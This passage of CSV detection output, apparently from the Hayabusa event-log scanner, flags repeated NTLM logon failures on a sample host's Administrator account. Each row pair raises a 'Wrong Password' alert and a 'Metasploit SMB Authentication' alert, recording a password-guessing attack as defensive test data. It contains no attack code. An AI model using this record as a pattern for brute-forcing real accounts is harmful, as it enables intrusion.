SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hi1dzny6hpyr5N3d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RlPVBSnDMlE0QZaJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: th72TwMoRXtDVWge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: KGTTiJSkErjzoUUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyzZwNLltF0cYnai : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gYWVQ6mCqyBfDm3m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rg2x2lv9JeS5Bb6l : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fU28NKC3WYxFGbMN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUWDXgnogGDXizWj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXhAtnNcQKOIsuGS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cKfrJwI3OGdjL4af : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VdekC160hU7YzrK9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enOBuzd6jwu8rZCH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: eAjLjDlZSps5D49t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rY6CONLBVygSTnY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6FIHgz2yqqbD9zfV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d82RRXgSmZdnfa8I : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xA3ZWnWc9CoGeKpm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FvSYKi8KvEtnmSbs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IvxXI1u0AwtNHNSU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OFIy6Cps3Rm87Kqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: slL3aPBnZl3lVJst : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O98P1oP3AU4lZp2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: EZZ7wIJNZ0CG7fMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7RhwHCqXQytvcaom : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xumaxbBEMZqL6pPO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ur1yZIwgB3ecNJGw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xAuGcKYRcLe0z3bl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmMi0edfBJ8KoJst : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlnoKbUb9jiqJD7t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hBeWGNkWTSp3nje8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2iwM6jPgNjZ3q5qb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xdkrA9Kwzero8eSk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Tb2ZvuJMxOfsxIT6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PBMBRPdATYpLNmyI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P1CKprAPSw4hgiBB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y8qtzwuGJfQG4XB7 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: auOf2GwkoymLh4bC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2YcMYQ4sA2GfMwCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YL1iM6WUtZIjIoTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7ruxdEGdeP3RLqF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZFXBpUJzafGYIggt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MC1K9nNLupH0NuSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6rVfBLm10US9II19 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SBhAVHHtR7lZ1C3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FKuUH8lMELYHibxF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UytgJLBtGRMCf3ar : IP Address: 192.168.198.149 : AuthPackage: 
